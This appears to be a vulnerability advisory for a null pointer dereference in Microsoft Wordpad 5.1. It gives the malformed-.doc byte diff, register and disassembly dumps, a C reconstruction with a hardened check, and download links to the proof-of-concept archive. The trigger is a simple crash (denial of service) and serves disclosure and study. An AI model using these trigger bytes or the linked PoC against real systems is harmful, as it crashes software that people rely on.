51 lines
No EOL
1.9 KiB
Text
Microsoft Wordpad 5.1 (.doc) Null Pointer Dereference Vulnerability

Found by condis

Tested on Windows XP SP 3 Professional PL
MS Wordpad 5.1 (Compilation 2600.xpsp.080413-2111 SP 3)

This is not the bug from CVE-2009-0259.

$ Binary diff of the template file (a proper empty .doc document) and the malformed file
(showing only the offset that differs):

0000 1200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 -- template file
0000 1200: 00 00 00 00 00 00 63 6F 6E 64 00 00 00 00 00 00 -- proof of concept

Actually it (almost) does not matter which 4 bytes we put there, as long as they are != 0x00.

Access violation when reading [00000004]

$ Registers:

eax = 020ebb72 ebx = 00000000 ecx = 020ebb7c edx = 00090608
esi = 00000000 edi = 01bc04a8 eip = 01b9dbbb esp = 0177f5c8
ebp = 0177f5cc

$ Function dump:

01b9dbb4 55           push ebp
01b9dbb5 8bec         mov ebp,esp
01b9dbb7 56           push esi
01b9dbb8 8b7508       mov esi,dword ptr [ebp+8]
01b9dbbb 807e0400     cmp byte ptr [esi+4],0 ds:0023:00000004=?? ; ---- crash
01b9dbbf 751b         jne mswrd8+0x1dbdc (01b9dbdc)
01b9dbc1 8b06         mov eax,dword ptr [esi]
01b9dbc3 57           push edi
01b9dbc4 8b78fc       mov edi,dword ptr [eax-4]
01b9dbc7 57           push edi
01b9dbc8 ff156010b801 call dword ptr [mswrd8+0x1060 (01b81060)]
01b9dbce 57           push edi
01b9dbcf ff157410b801 call dword ptr [mswrd8+0x1074 (01b81074)]
01b9dbd5 56           push esi
01b9dbd6 e87bfdffff   call mswrd8+0x1d956 (01b9d956)
01b9dbdb 5f           pop edi
01b9dbdc 5e           pop esi
01b9dbdd 5d           pop ebp

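As an added illustration (not code from the advisory or from mswrd8), here is a C reconstruction of the shape of the crashing routine next to a checked version; the struct layout, the field names and the stand-in calls are assumptions read off the disassembly, with the pointer in esi treated as the routine's only argument:

```c
#include <stddef.h>
#include <stdint.h>
/* Hypothetical object layout reconstructed from the disassembly (32-bit
 * build): the routine gets a pointer in [ebp+8] (esi), tests the byte at
 * offset 4 and, when it is zero, releases the buffer at offset 0 whose
 * length word sits 4 bytes before it ([eax-4]). All names are assumptions. */
struct wp_obj {
    uint8_t *buf;   /* [esi]   */
    uint8_t  flag;  /* [esi+4] */
};

/* Stand-ins for the two imported calls and the internal call; they only
 * count invocations so the behaviour can be checked. */
static int calls_seen;
static void import_1060(size_t len) { (void)len; calls_seen++; }
static void import_1074(size_t len) { (void)len; calls_seen++; }
static void mswrd8_1d956(struct wp_obj *o) { (void)o; calls_seen++; }

/* Shape of the crashing routine: [esi+4] is read with no NULL check, so
 * o == NULL becomes a read of address 0x00000004, the violation reported. */
static void release_unchecked(struct wp_obj *o)
{
    if (o->flag != 0)                        /* cmp byte ptr [esi+4],0 */
        return;                              /* jne -> skip release    */
    size_t len = *((size_t *)o->buf - 1);    /* mov edi,[eax-4]        */
    import_1060(len);
    import_1074(len);
    mswrd8_1d956(o);
}

/* Hardened form: validate the object before any dereference.
 * Returns 0 on success and -1 when the object or its buffer is missing. */
static int release_checked(struct wp_obj *o)
{
    if (o == NULL || (o->flag == 0 && o->buf == NULL))
        return -1;
    release_unchecked(o);
    return 0;
}

/* Builds a constructed object whose buffer is preceded by a length word,
 * as the [eax-4] read expects, and checks that all three calls are made. */
static int demo_valid_object(void)
{
    static size_t storage[4] = { 8, 0, 0, 0 };  /* storage[0] = length */
    struct wp_obj o = { (uint8_t *)&storage[1], 0 };
    calls_seen = 0;
    return release_checked(&o) == 0 && calls_seen == 3;
}
```

Calling release_unchecked with a NULL pointer reproduces the fault pattern on any platform, which is why the checked version refuses the object before touching it.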
$ 'O, hai' goes to Echo, Varseand, cxecurity and madcow ;3

$ Below you should see a link to the attachment with the PoC:

http://cond.psychodela.pl/d/ms-wordpad-nullptr.rar
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18952.rar